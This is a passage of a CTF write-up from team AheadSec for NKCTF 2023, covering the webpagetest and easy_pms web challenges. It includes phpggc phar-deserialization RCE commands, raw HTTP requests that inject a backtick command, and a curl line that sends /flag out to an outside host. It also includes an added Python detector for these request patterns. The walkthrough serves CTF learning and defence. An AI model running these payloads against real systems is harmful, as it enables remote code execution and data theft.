NKCTF 2023 Writeup By AheadSec


Thanks to every member of the team for the hard work~

Web: Nacl, monkey111
Misc: Nacl, mochu7
Social Engineering: Nacl, monkey111, mochu7
Crypto: range
Pwn: gwoo, Helen
Reverse: Helen


Contents

Web: webpagetest, easy_pms, hard_php, eazy_php, baby_php, easy_cms, xiaopi
Misc: hard-misc, blue, 三体, THMaster, easy_rgb, easy_word, first spam of rabbit year, easy_bmp, baby_music, easymusic
Crypto: ez_polynomial
Reverse: ez_baby_apk
Pwn: ez_shellcode, a_story_of_a_pwner
Social Engineering: 狂飙, 两个人的夜晚, Bridge, 旅程的开始, real-social-engineering, The other Bridge, Ferris_Wheel

Web

webpagetest

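This challenge is a webpagetest deserialization issue. First download https://github.com/ambionics/phpggc.git, then change php.ini so that phar archives can be written:

    [Phar]
    phar.readonly = Off

Then generate the payload and send it: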

    ./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini
    URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
    curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
    curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

The commands above must be run in order, and none of them may fail.

easy_pms

Get a cookie:

    POST /repo-create.html HTTP/1.1
    Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html
    Content-Length: 111

    product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=

Execute the command. The response does not echo enough of the output, so curl is used to send the output out-of-band:

    POST /repo-edit-10000-10000.html HTTP/1.1
    Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html
    Content-Length: 85

    SCM=Subversion&client=`curl 1x.x.x.x:8080/\`cat /flag | sed -n '2p' | base64\``
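A defensive check for the request shapes in the webpagetest and easy_pms sections, as an added example that is not part of the original writeup: it decodes a form body and flags a URL scheme in rkey, a phar stub token in ini, and shell metacharacters in client. The rule names, function names and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Field names come from the requests in this writeup; rule names are made up here.
RULES = {
    # A test key should never look like a URL or PHP stream wrapper (phar://, php://, ...).
    "rkey": ("stream-wrapper", re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)),
    # Phar-format archives carry a PHP stub that contains this token.
    "ini": ("phar-stub", re.compile(r"__HALT_COMPILER\(\);", re.I)),
    # Backticks, $( and chaining/redirection characters in a client binary path.
    "client": ("shell-metachar", re.compile(r"[`;|&<>\n]|\$\(")),
}

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded values cannot hide a match."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_body(body):
    """Return (field, rule) pairs for suspicious fields in a urlencoded form body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        if rule and rule[1].search(fully_decode(value)):
            findings.append((name, rule[0]))
    return findings

# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "rkey=gadget&ini=%5Bsettings%5D%0Alabel%3Dtest",               # benign
    "rkey=phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fresults%2Fx%2Ffoo&ini=a",
    "rkey=gadget&ini=%3C%3Fphp%20__HALT_COMPILER%28%29%3B%20%3F%3E",
    "SCM=Subversion&client=%60echo+test%60",
    "SCM=Subversion&client=%2Fusr%2Fbin%2Fsvn",                    # benign
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body[:60])
```
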


hard_php

